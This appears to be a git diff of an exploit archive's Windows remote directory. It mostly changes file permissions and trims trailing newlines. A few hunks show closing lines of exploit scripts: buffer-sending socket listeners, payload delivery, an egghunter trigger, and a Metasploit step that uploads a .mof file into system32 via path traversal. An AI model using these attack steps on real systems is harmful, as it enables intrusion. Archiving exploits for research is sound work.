a/platforms/windows/remote/4008.html b/platforms/windows/remote/4008.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4010.html b/platforms/windows/remote/4010.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4015.html b/platforms/windows/remote/4015.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4021.html b/platforms/windows/remote/4021.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4023.html b/platforms/windows/remote/4023.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4042.html b/platforms/windows/remote/4042.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4043.html b/platforms/windows/remote/4043.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/40445.txt b/platforms/windows/remote/40445.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4049.html b/platforms/windows/remote/4049.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4050.html b/platforms/windows/remote/4050.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4052.c b/platforms/windows/remote/4052.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4053.c b/platforms/windows/remote/4053.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4060.html b/platforms/windows/remote/4060.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4061.html b/platforms/windows/remote/4061.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4065.html b/platforms/windows/remote/4065.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4066.html b/platforms/windows/remote/4066.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/40694.txt b/platforms/windows/remote/40694.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/40721.html b/platforms/windows/remote/40721.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/40857.txt b/platforms/windows/remote/40857.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/40862.py b/platforms/windows/remote/40862.py index ddf73d265..d82d8ac5f 100755 --- a/platforms/windows/remote/40862.py +++ b/platforms/windows/remote/40862.py @@ -238,4 +238,4 @@ canceljob = "47494f500100000000000030000000000000008e0100000000000010" + objectk ###phase6 - delete the jobset -deletejob = "47494f500100000000000038000000000000009e0100000000000010" + objectkey + "0000000d44656c6574654a6f625365740000000000000000" \ No newline at end of file +deletejob = "47494f500100000000000038000000000000009e0100000000000010" + objectkey + "0000000d44656c6574654a6f625365740000000000000000" \ No newline at end of file diff --git a/platforms/windows/remote/40881.html b/platforms/windows/remote/40881.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4094.html b/platforms/windows/remote/4094.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/40990.txt b/platforms/windows/remote/40990.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4101.html b/platforms/windows/remote/4101.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/41073.py b/platforms/windows/remote/41073.py index 14f6b7ed6..dd724b5eb 100755 --- a/platforms/windows/remote/41073.py +++ b/platforms/windows/remote/41073.py @@ -54,10 +54,4 @@ print 'Listening on LPD port: '+str(port) while True: conn, addr = s.accept() conn.send(buffer) - conn.close() - - - - - - \ No newline at end of file + conn.close() \ No newline at end of file diff --git a/platforms/windows/remote/4109.html b/platforms/windows/remote/4109.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4110.html b/platforms/windows/remote/4110.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/41148.html b/platforms/windows/remote/41148.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4119.html b/platforms/windows/remote/4119.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4123.html b/platforms/windows/remote/4123.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4143.html b/platforms/windows/remote/4143.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4146.cpp b/platforms/windows/remote/4146.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/41479.py b/platforms/windows/remote/41479.py index 33ba0a749..93e007e97 100755 --- a/platforms/windows/remote/41479.py +++ b/platforms/windows/remote/41479.py @@ -64,5 +64,4 @@ print(len(rev_met_2)) while True: conn, addr = s.accept() conn.send('220 '+buffer+'ESMTP Sendmail \r\n') - conn.close() - \ No newline at end of file + conn.close() \ No newline at end of file diff --git a/platforms/windows/remote/41545.py b/platforms/windows/remote/41545.py index 21b49db9f..8b01b567c 100755 --- a/platforms/windows/remote/41545.py +++ b/platforms/windows/remote/41545.py @@ -64,5 +64,4 @@ elif len(rev_met_2) >= 76: while True: conn, addr = s.accept() conn.send('220 '+buffer+'\r\n') - conn.close() - \ No newline at end of file + conn.close() \ No newline at end of file diff --git a/platforms/windows/remote/4155.html b/platforms/windows/remote/4155.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4157.cpp b/platforms/windows/remote/4157.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4158.html b/platforms/windows/remote/4158.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/41592.txt b/platforms/windows/remote/41592.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4160.html b/platforms/windows/remote/4160.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/41638.txt b/platforms/windows/remote/41638.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4170.html b/platforms/windows/remote/4170.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/41751.txt b/platforms/windows/remote/41751.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4176.html b/platforms/windows/remote/4176.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4177.html b/platforms/windows/remote/4177.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/418.c b/platforms/windows/remote/418.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/41825.txt b/platforms/windows/remote/41825.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/41850.txt b/platforms/windows/remote/41850.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/41852.txt b/platforms/windows/remote/41852.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4188.txt b/platforms/windows/remote/4188.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4190.html b/platforms/windows/remote/4190.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/41903.txt b/platforms/windows/remote/41903.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/41975.txt b/platforms/windows/remote/41975.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/42.c b/platforms/windows/remote/42.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4200.html b/platforms/windows/remote/4200.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/42041.txt b/platforms/windows/remote/42041.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4208.html b/platforms/windows/remote/4208.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/421.c b/platforms/windows/remote/421.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/42128.txt b/platforms/windows/remote/42128.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4214.html b/platforms/windows/remote/4214.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/42159.txt b/platforms/windows/remote/42159.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4217.html b/platforms/windows/remote/4217.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4222.c b/platforms/windows/remote/4222.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4226.html b/platforms/windows/remote/4226.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4230.html b/platforms/windows/remote/4230.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/42316.ps1 b/platforms/windows/remote/42316.ps1 old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/42327.html b/platforms/windows/remote/42327.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4234.html b/platforms/windows/remote/4234.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4237.html b/platforms/windows/remote/4237.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4240.html b/platforms/windows/remote/4240.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4244.html b/platforms/windows/remote/4244.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4245.html b/platforms/windows/remote/4245.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4247.c b/platforms/windows/remote/4247.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/42484.html b/platforms/windows/remote/42484.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4250.html b/platforms/windows/remote/4250.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4255.html b/platforms/windows/remote/4255.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/42557.py b/platforms/windows/remote/42557.py index c7f29929f..161607f53 100755 --- a/platforms/windows/remote/42557.py +++ b/platforms/windows/remote/42557.py @@ -93,4 +93,4 @@ packet += "Connection: keep-alive\r\n" packet += "Referer: http://pyramidcyber.com\r\n" packet += "\r\n" s.send(packet) -s.close() +s.close() \ No newline at end of file diff --git a/platforms/windows/remote/42558.py b/platforms/windows/remote/42558.py index 0d34a2f45..0ff9720f5 100755 --- a/platforms/windows/remote/42558.py +++ b/platforms/windows/remote/42558.py @@ -93,4 +93,4 @@ packet += "Connection: keep-alive\r\n" packet += "Referer: http://pyramidcyber.com\r\n" packet += "\r\n" s.send(packet) -s.close() +s.close() \ No newline at end of file diff --git a/platforms/windows/remote/42559.py b/platforms/windows/remote/42559.py index 4282675b5..4305b2851 100755 --- a/platforms/windows/remote/42559.py +++ b/platforms/windows/remote/42559.py @@ -93,4 +93,4 @@ packet += "Connection: keep-alive\r\n" packet += "Referer: http://pyramidcyber.com\r\n" packet += "\r\n" s.send(packet) -s.close() +s.close() \ No newline at end of file diff --git a/platforms/windows/remote/42560.py b/platforms/windows/remote/42560.py index bdf8b8ec4..a8e866d3f 100755 --- a/platforms/windows/remote/42560.py +++ b/platforms/windows/remote/42560.py @@ -93,4 +93,4 @@ packet += "Connection: keep-alive\r\n" packet += "Referer: http://pyramidcyber.com\r\n" packet += "\r\n" s.send(packet) -s.close() +s.close() \ No newline at end of file diff --git a/platforms/windows/remote/4259.txt b/platforms/windows/remote/4259.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/426.c b/platforms/windows/remote/426.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/42614.txt b/platforms/windows/remote/42614.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/42683.txt b/platforms/windows/remote/42683.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/42691.rb b/platforms/windows/remote/42691.rb index 50b628bfb..044e6fb01 100755 --- a/platforms/windows/remote/42691.rb +++ b/platforms/windows/remote/42691.rb @@ -65,4 +65,4 @@ class MetasploitModule < Msf::Exploit::Remote service.close_client(client) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/42693.rb b/platforms/windows/remote/42693.rb index 1cf2092ff..5b2a4a655 100755 --- a/platforms/windows/remote/42693.rb +++ b/platforms/windows/remote/42693.rb @@ -70,4 +70,4 @@ class MetasploitModule < Msf::Exploit::Remote service.close_client(client) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/42694.rb b/platforms/windows/remote/42694.rb index 6a3b6fb04..525e264c5 100755 --- a/platforms/windows/remote/42694.rb +++ b/platforms/windows/remote/42694.rb @@ -97,4 +97,4 @@ class MetasploitModule < Msf::Exploit::Remote handler end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/42696.rb b/platforms/windows/remote/42696.rb index 97923e28b..e32e34959 100755 --- a/platforms/windows/remote/42696.rb +++ b/platforms/windows/remote/42696.rb @@ -81,4 +81,4 @@ class MetasploitModule < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/42700.rb b/platforms/windows/remote/42700.rb index 9b7090053..918cdd130 100755 --- a/platforms/windows/remote/42700.rb +++ b/platforms/windows/remote/42700.rb @@ -68,4 +68,4 @@ class MetasploitModule < Msf::Exploit::Remote service.close_client(client) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/42703.rb b/platforms/windows/remote/42703.rb index 13898efb1..cde5bf2a3 100755 --- a/platforms/windows/remote/42703.rb +++ b/platforms/windows/remote/42703.rb @@ -109,4 +109,4 @@ class MetasploitModule < Msf::Exploit::Remote end end -__END__ +__END__ \ No newline at end of file diff --git a/platforms/windows/remote/42704.rb b/platforms/windows/remote/42704.rb index e57355225..0fcc6933e 100755 --- a/platforms/windows/remote/42704.rb +++ b/platforms/windows/remote/42704.rb @@ -124,4 +124,4 @@ class MetasploitModule < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/42711.txt b/platforms/windows/remote/42711.txt old mode 100755 new mode 100644 index 91c63ef54..dc43192a9 --- a/platforms/windows/remote/42711.txt +++ b/platforms/windows/remote/42711.txt @@ -14,4 +14,4 @@ If all is good mspaint should run. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42711.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42711.zip \ No newline at end of file diff --git a/platforms/windows/remote/42719.rb b/platforms/windows/remote/42719.rb index e34599b1a..f25d11aee 100755 --- a/platforms/windows/remote/42719.rb +++ b/platforms/windows/remote/42719.rb @@ -121,4 +121,4 @@ class MetasploitModule < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/42720.rb b/platforms/windows/remote/42720.rb index ebcd3641f..c5af4fa59 100755 --- a/platforms/windows/remote/42720.rb +++ b/platforms/windows/remote/42720.rb @@ -109,4 +109,4 @@ class MetasploitModule < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/42721.rb b/platforms/windows/remote/42721.rb index 806df9bbe..92fa0df09 100755 --- a/platforms/windows/remote/42721.rb +++ b/platforms/windows/remote/42721.rb @@ -85,4 +85,4 @@ class MetasploitModule < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/42722.rb b/platforms/windows/remote/42722.rb index dabce3c41..ecbabe742 100755 --- a/platforms/windows/remote/42722.rb +++ b/platforms/windows/remote/42722.rb @@ -102,4 +102,4 @@ __END__ 0033C081 5E POP ESI 0033C082 B8 01000000 MOV EAX,1 0033C087 5B POP EBX -0033C088 C3 RETN +0033C088 C3 RETN \ No newline at end of file diff --git a/platforms/windows/remote/42723.rb b/platforms/windows/remote/42723.rb index 0c1b5e09c..bac2ebfae 100755 --- a/platforms/windows/remote/42723.rb +++ b/platforms/windows/remote/42723.rb @@ -71,4 +71,4 @@ class MetasploitModule < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/42724.rb b/platforms/windows/remote/42724.rb index 19b4b2221..b8f4fd971 100755 --- a/platforms/windows/remote/42724.rb +++ b/platforms/windows/remote/42724.rb @@ -75,4 +75,4 @@ class MetasploitModule < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/42725.rb b/platforms/windows/remote/42725.rb index 58c96043f..9e0b2ef7d 100755 --- a/platforms/windows/remote/42725.rb +++ b/platforms/windows/remote/42725.rb @@ -85,4 +85,4 @@ class MetasploitModule < Msf::Exploit::Remote print_status("#{peer} - Uploading .mof...") upload("#{levels}WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/42778.py b/platforms/windows/remote/42778.py index d03ab9e9f..801f0ebcb 100755 --- a/platforms/windows/remote/42778.py +++ b/platforms/windows/remote/42778.py @@ -86,4 +86,4 @@ if __name__ == "__main__": t = threading.Thread(target=send_egghunter_request) t.start() print "[+] Thread started." - send_exploit_request() + send_exploit_request() \ No newline at end of file diff --git a/platforms/windows/remote/4279.html b/platforms/windows/remote/4279.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/42891.txt b/platforms/windows/remote/42891.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4290.html b/platforms/windows/remote/4290.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4292.cpp b/platforms/windows/remote/4292.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/42952.py b/platforms/windows/remote/42952.py index b77ba2eeb..fcbfa755b 100755 --- a/platforms/windows/remote/42952.py +++ b/platforms/windows/remote/42952.py @@ -60,5 +60,4 @@ try: print "Serving at port: ", 3311 httpd.serve_forever() except: - print "Exiting..." - + print "Exiting..." \ No newline at end of file diff --git a/platforms/windows/remote/42973.py b/platforms/windows/remote/42973.py index 0a4af0a94..8dd0e99de 100755 --- a/platforms/windows/remote/42973.py +++ b/platforms/windows/remote/42973.py @@ -100,4 +100,4 @@ print "Sending the payload!" expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) expl.connect(("10.10.10.10", 80)) expl.send(buf) -expl.close() +expl.close() \ No newline at end of file diff --git a/platforms/windows/remote/42984.rb b/platforms/windows/remote/42984.rb index 9d14f3994..7acf08389 100755 --- a/platforms/windows/remote/42984.rb +++ b/platforms/windows/remote/42984.rb @@ -92,4 +92,4 @@ class MetasploitModule < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/4299.html b/platforms/windows/remote/4299.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4301.cpp b/platforms/windows/remote/4301.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/43025.py b/platforms/windows/remote/43025.py index 4c6a8b881..6fbf304b9 100755 --- a/platforms/windows/remote/43025.py +++ b/platforms/windows/remote/43025.py @@ -64,6 +64,4 @@ while True: print conn.recv(1024) conn.send(buff + '\r\n') print conn.recv(1024) - conn.send('257' + '\r\n') - - + conn.send('257' + '\r\n') \ No newline at end of file diff --git a/platforms/windows/remote/43059.py b/platforms/windows/remote/43059.py index d23f4cbb9..2e37a6911 100755 --- a/platforms/windows/remote/43059.py +++ b/platforms/windows/remote/43059.py @@ -76,4 +76,4 @@ csock.send(buf) print binascii.hexlify(csock.recv(0x4000)) #necessary reads print binascii.hexlify(csock.recv(0x4000)) -csock.close() +csock.close() \ No newline at end of file diff --git a/platforms/windows/remote/431.c b/platforms/windows/remote/431.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/43121.txt b/platforms/windows/remote/43121.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4316.cpp b/platforms/windows/remote/4316.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4322.html b/platforms/windows/remote/4322.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4323.html b/platforms/windows/remote/4323.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4324.html b/platforms/windows/remote/4324.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4328.html b/platforms/windows/remote/4328.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4334.txt b/platforms/windows/remote/4334.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4348.c b/platforms/windows/remote/4348.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/435.c b/platforms/windows/remote/435.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4351.html b/platforms/windows/remote/4351.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4357.html b/platforms/windows/remote/4357.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4366.html b/platforms/windows/remote/4366.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4367.c b/platforms/windows/remote/4367.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4372.html b/platforms/windows/remote/4372.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4388.html b/platforms/windows/remote/4388.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4389.html b/platforms/windows/remote/4389.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/439.c b/platforms/windows/remote/439.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4393.html b/platforms/windows/remote/4393.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4394.html b/platforms/windows/remote/4394.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4398.html b/platforms/windows/remote/4398.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4420.html b/platforms/windows/remote/4420.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4424.html b/platforms/windows/remote/4424.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4427.html b/platforms/windows/remote/4427.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4428.html b/platforms/windows/remote/4428.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4438.cpp b/platforms/windows/remote/4438.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4445.html b/platforms/windows/remote/4445.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4452.html b/platforms/windows/remote/4452.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4453.html b/platforms/windows/remote/4453.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4468.html b/platforms/windows/remote/4468.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4487.html b/platforms/windows/remote/4487.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4488.html b/platforms/windows/remote/4488.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/45.c b/platforms/windows/remote/45.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4506.html b/platforms/windows/remote/4506.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4526.html b/platforms/windows/remote/4526.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4579.html b/platforms/windows/remote/4579.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4594.html b/platforms/windows/remote/4594.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4598.html b/platforms/windows/remote/4598.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4651.cpp b/platforms/windows/remote/4651.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4663.html b/platforms/windows/remote/4663.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4664.txt b/platforms/windows/remote/4664.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4699.txt b/platforms/windows/remote/4699.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4700.txt b/platforms/windows/remote/4700.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4713.txt b/platforms/windows/remote/4713.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4715.txt b/platforms/windows/remote/4715.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/472.c b/platforms/windows/remote/472.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4720.html b/platforms/windows/remote/4720.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/473.c b/platforms/windows/remote/473.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4745.cpp b/platforms/windows/remote/4745.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4746.html b/platforms/windows/remote/4746.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4747.vbs b/platforms/windows/remote/4747.vbs old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4760.txt b/platforms/windows/remote/4760.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/478.c b/platforms/windows/remote/478.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/48.c b/platforms/windows/remote/48.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/480.c b/platforms/windows/remote/480.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4806.html b/platforms/windows/remote/4806.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4818.html b/platforms/windows/remote/4818.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4819.html b/platforms/windows/remote/4819.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4820.html b/platforms/windows/remote/4820.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4825.html b/platforms/windows/remote/4825.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4868.html b/platforms/windows/remote/4868.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4869.html b/platforms/windows/remote/4869.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4873.html b/platforms/windows/remote/4873.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4874.html b/platforms/windows/remote/4874.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4894.html b/platforms/windows/remote/4894.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4903.html b/platforms/windows/remote/4903.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4906.txt b/platforms/windows/remote/4906.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4909.html b/platforms/windows/remote/4909.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4913.html b/platforms/windows/remote/4913.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4918.html b/platforms/windows/remote/4918.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4923.txt b/platforms/windows/remote/4923.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4932.html b/platforms/windows/remote/4932.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4934.c b/platforms/windows/remote/4934.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4946.html b/platforms/windows/remote/4946.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4948.txt b/platforms/windows/remote/4948.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4949.txt b/platforms/windows/remote/4949.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4959.html b/platforms/windows/remote/4959.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4967.html b/platforms/windows/remote/4967.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4974.html b/platforms/windows/remote/4974.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4979.html b/platforms/windows/remote/4979.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4981.html b/platforms/windows/remote/4981.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4982.html b/platforms/windows/remote/4982.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4986.html b/platforms/windows/remote/4986.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4987.html b/platforms/windows/remote/4987.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/4999.htm b/platforms/windows/remote/4999.htm old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/5.c b/platforms/windows/remote/5.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/5005.html b/platforms/windows/remote/5005.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/5025.html b/platforms/windows/remote/5025.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/5028.html b/platforms/windows/remote/5028.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/5045.html b/platforms/windows/remote/5045.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/5046.php b/platforms/windows/remote/5046.php old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/5048.html b/platforms/windows/remote/5048.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/5049.html b/platforms/windows/remote/5049.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/5051.html b/platforms/windows/remote/5051.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/5052.html b/platforms/windows/remote/5052.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/5078.htm b/platforms/windows/remote/5078.htm old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/5087.html b/platforms/windows/remote/5087.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/51.c b/platforms/windows/remote/51.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/5100.html b/platforms/windows/remote/5100.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/5102.html b/platforms/windows/remote/5102.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/5106.html b/platforms/windows/remote/5106.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/5111.html b/platforms/windows/remote/5111.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/5153.asp b/platforms/windows/remote/5153.asp old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/5188.html b/platforms/windows/remote/5188.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/5190.html b/platforms/windows/remote/5190.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/5193.html b/platforms/windows/remote/5193.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/5205.html b/platforms/windows/remote/5205.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/5213.txt b/platforms/windows/remote/5213.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/5228.txt b/platforms/windows/remote/5228.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/5230.txt b/platforms/windows/remote/5230.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/5264.html b/platforms/windows/remote/5264.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/5269.txt b/platforms/windows/remote/5269.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/5332.html b/platforms/windows/remote/5332.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/5338.html b/platforms/windows/remote/5338.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/5395.html 